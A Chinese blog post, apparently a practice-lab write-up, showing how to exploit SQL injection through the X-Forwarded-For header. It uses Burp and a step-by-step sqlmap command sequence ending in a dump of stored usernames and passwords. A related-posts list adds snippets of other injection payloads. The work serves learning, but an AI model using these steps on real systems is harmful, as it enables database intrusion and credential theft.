安科网

X-forwarded-for注入漏洞实战

ALiDan

ALiDan

2019-10-21

关注 关注

1、掌握SQL注入的基本原理;
2、了解服务器获取客户端IP的方式;
3、了解SQL注入的工具使用;

随便输入用户名密码登录,提示有ip信息,根据题目的意思是信息是根据x-forwarded-for的纸变得,所以本题存在x-forwarded-for注入
1.首先打开burp抓包,添加x-forwarded-for:*,将raw的信息存为txt文件,如下图所示,速度比较慢,请耐心等待

X-forwarded-for注入漏洞实战

2:#sqlmap -r 1.txt --current-db --batch    //爆出数据库3:#sqlmap -r 1.txt -D webcalendar --tables  //爆出表4:#sqlmap -r 1.txt -D webcalendar -T user --columns //爆出列5:#sqlmap -r 1.txt -D webcalendar -T user -C username,password --dump //爆出数据库用户名和密码这是墨者平台的一道注入题
 
  
 
  注入漏洞  sqlmap  
 
 
 
 
 
  ALiDan  
 
 
  ALiDan  
 
  0 关注   0 粉丝   0 动态  
 
 
   关注    关注   
 
 
 
 
 
 
 相关推荐 
  
 
 
  第三天--注入攻击:Web安全之SQL注入漏洞专题  
 
 
 
   第三天--注入攻击:Web安全之SQL注入漏洞专题。SQL手工注入上节课就讲过了,简单复习下。使用union联合查询数据库,数据表,字段以及字段信息。Sqlmap.py –u URL –p 具体参数。结合Burpsuite读取日志文件。Burp提取HTTP     
 
 
  godfather    2020-06-13  
 
  
 
 
  web安全pikachu靶场之SQL注入  
 
 
 
   数据库注入漏洞,主要是开发人员在构建代码时, 没有对输入边界进行安全考虑,导致攻击者可以通过合法的输入点提交一些精心构造的语句,从而欺骗后台数据库对其进行执行,导致数据库信息泄漏的一-种漏洞。在owasp发布的top10排行榜里,注入漏洞一直是危害排名第一     
 
 
  一对儿程序猿    2020-07-04  
 
  
 
 
  CVE-2018-8045 Joomla内核SQL注入漏洞  
 
 
 
   Joomla是一套全球知名的内容管理系统,使用PHP语言、MySQL数据库所开发,适用于Linux、 Windows、MacOSX等各种平台。Joomla的运行环境是PHP+MYSQL+Apache,而phpStudy则集成了这三种程序,只要安装了phpS     
 
 
  godfather    2020-06-03  
 
  
 
 
  SQL注入漏洞测试(登录绕过)  
 
 
 
   SELECT * FROM accounts WHERE username=‘admin‘ and password = ‘password‘。  后端如果没做校验处理,username 和 password 值从前端传进来直接执行sql语句,就存在可以构     
 
 
  明月清风精进不止    2020-05-07  
 
  
 
 
  简述sql注入漏洞  
 
 
 
   在写与数据库交互的语句时,直接将用户输入的数据跟sql语句进行拼接,没有过滤内容,导致用户可以修改整条语句的结构,产生不同的数据库操作语句,没有经过任何的过滤就直接放入数据库引擎执行。sql注入的危害,一直排行在owasp排行榜的top10高居不下,其危害     
 
 
  liuyang000    2020-04-20  
 
  
 
 
  phpyun人才管理系统V5.0 SQL注入漏洞分析  
 
 
 
   PHP云人才管理系统是国内主流人才管理CMS系统之一!PHP云专为中文用户设计和开发,采用:B/S+c/s技术框架,程序源代码100%完全开放!基于PHP 和 MySQL 数据库构建的为核心开发。Phpyun最新版本V5.0中,在用户邮箱认证处,存在SQL     
 
 
  qshpeng    2020-03-26  
 
  
 
 
  2019-2020-1学期 20192404 《网络空间安全专业导论》第十一周学习总结  
 
 
 
   黑客攻击Web应用服务器、中间件、数据库,;利用漏洞、在网页中植入恶意代码。SQL注入漏洞是Web层面最高危的漏洞之一。SQL注入漏洞的形成原因就是:用户输入的数据被SQL解释器执行。在特定情况下使用这三个函数,可限制用户的输入为数字型。参数化查询一般作为     
 
 
  huolan    2019-12-18  
 
  
 
 
  JDBC的SQL注入漏洞分析和解决  
 
 
 
   需要采用PreparedStatement对象解决SQL注入漏洞。这个对象将SQL预先进行编译,使用?所代表内容是SQL所固定。这个时候也不会识别这些关键字。// 定义一个变量:. String sql = "select * from user     
 
 
  tanrong    2019-10-22  
 
  
 
 
  Apache Camel XML外部实体注入漏洞(CVE-2019-0188)  
 
 
 
   BUGTRAQ ID: 108422CVE ID: CVE-2019-0188Apache Camel是美国阿帕奇软件基金会的一套开源的基于Enterprise Integration Pattern的集成框架。Apache Camel存在一个XML外部实     
 
 
  挖山    2019-06-01  
 
  
 
 
  Android平台的SQL注入漏洞浅析(一条短信控制你的手机)  
 
 
 
   14年11月笔者在百度xteam博客中看到其公开了此前报告给Google的CVE-2014-8507漏洞细节——系统代码在处理经由短信承载的WAP推送内容时产生的经典SQL注入漏洞,影响Android 5.0以下的系统。于是对这个漏洞产生了兴趣,想深入分析     
 
 
  网络安全管理WL00    2016-01-31  
 
  
 
 
  发掘MaosinCMS网站系统漏洞与测试  
 
 
 
   这种漏洞用工具是扫不到的,可以说注入已经由显式转为隐式了,必须查看源代码才有可能发现潜在的漏洞。不过想利用这个注入点,首先需要注册个普通用户。看到是在user_publish.asp文件出了安全问题,翻看代码发现真正的漏洞代码不在user_publish.     
 
 
  K黄    2011-03-10  
 
  
 
 
  phpcms V9 BLind SQL 注入漏洞0day  
 
 
 
   漏洞描述:phpcms v9 blind 参数过滤存在SQL注入漏洞。     
 
 
  明天会怎么样    2011-03-10  
 
  
 
 
  恒浪IMS整合系统V4.1 多文件存在SQL注入漏洞  
 
 
 
   ===在文件User_ModifyPWD.asp中: sql="select * from hl_user where id="&ReplaceBadChar //第184行rs.open sql,conn,1,3程序使用过滤字     
 
 
  MySQLDBA    2009-05-23  
 
  
 
 
  DedeCms注入漏洞 影响版本5.3、5.5Posted in php  
 
 
 
   > 可看见以下错误信息 注入成功 2. 访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。int Error: Illegal double '1024e1024' valu     
 
 
  GNU    2009-08-30  
 
  
 
 
  PHP-Nuke 4nChat错误验证roomid参数 SQL注入漏洞  
 
 
 
   受影响系统: PHP-Nuke 4nChat 0.91 描述: PHP-Nuke是一个广为流行的网站创建和管理工具,它可以使用很多数据库软件作为后端,比如MySQL、PostgreSQL、mSQL、Interbase、Sybase等。PHP-Nuke的实现     
 
 
  MySQLDBA    2008-10-07  
 
  
 
 
  DedeCMS全版本通杀SQL注入漏洞利用代码及工具2014年2月28日  
 
 
 
   织梦内容管理系统 以简单、实用、开源而闻名,是国内最知名的PHP开源网站管理系统,也是使用用户最多的PHP类CMS系统。50000select*/1,2,3,,5,6,7,8,9%23@`\'`+&_FILES[type][name]=1.jpg&     
 
 
  HuangRam    2014-02-27  
 
  
 
 
  Discuz!NT 2.5最新注入漏洞测试分析(图)  
 
 
 
   最近,ISTO成员在其最新的2.5版本中发现了一个安全漏洞,成功利用此漏洞可以直接修改管理员的密码进入后台,取得管理员权限,从而控制整个网站。NT版本:2.5  URL:http://www.gslw.com  数据库:SQL Server 2005  1     
 
 
  PlumRain    2008-10-07  
 
  
 
 
  手工注入方法,方便大家测试程序漏洞  
 
 
 
   防注入解决办法: 在URL的地址后面加上'%2B'(字符型) 分析:URL地址变为:news.asp?id=123'%2B',返回的页面和1同;加 上'2%2B'asdf,URL地址变为:news.asp?id=123'%2Basdf,返回的页面和1 不同     
 
 
  hebbely    2011-11-02  
 
  
 
 
  phpcms SQL注入漏洞 adsclass.php 页面过滤不严  
 
 
 
   Phpcms 采用模块化方式开发,功能易用便于扩展,可面向大中型站点提供重量级网站建设解决方案。$c_ads->edit) showmessage; //47行 变量$adsid没有经过处理就直接进入SQL查询,造成SQL注入。漏洞利用: 1、注册普     
 
 
  zilong0    2010-05-23  
 
  
 
 
  PHP网站常见安全漏洞及防御方法  
 
 
 
   目前,基于PHP的网站开发已经成为目前网站开发的主流,本文笔者重点从PHP网站攻击与安全防范方面进行探究,旨在减少网站漏洞,希望对大家有所帮助!分别是Session文件漏洞、SQL注入漏洞、脚本命令执行漏洞、全局变量漏洞和文件漏洞。Session攻击是黑客     
 
 
  jiweianquan    2015-07-09  
 
  
 
 
 
 
 
 
 
  ALiDan  
 
 
  ALiDan  
  
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 W3CSchool教程 
 
 HTML 教程 
 
 CSS 教程 
 
 Bootstrap 教程 
 
 Javascript 教程 
 
 jQuery 教程 
 
 
 
 后端教程 
 
 C 教程 
 
 Java 教程 
 
 PHP 教程 
 
 Python 教程 
 
 Go 教程 
 
 
 
 移动开发 
 
 Android 教程 
 
 Swift 教程 
 
 Kotlin 教程 
 
 jQuery Mobile 教程 
 
 ionic 教程 
 
 
 
 关于我们 
 
 新闻动态 
 
 联系方式 
 
 招聘英才 
 
 安科实验室 
 
 帮助与反馈 
 
 
 
 
 
 安科网(Ancii),中国第一极客网 
 
     
  •   
    •  
  •   
    •  
 
 
 
 
 
  
 Copyright © 2013 - 2019 Ancii.com 
 
 京ICP备18063983号 京公网安备11010802014868号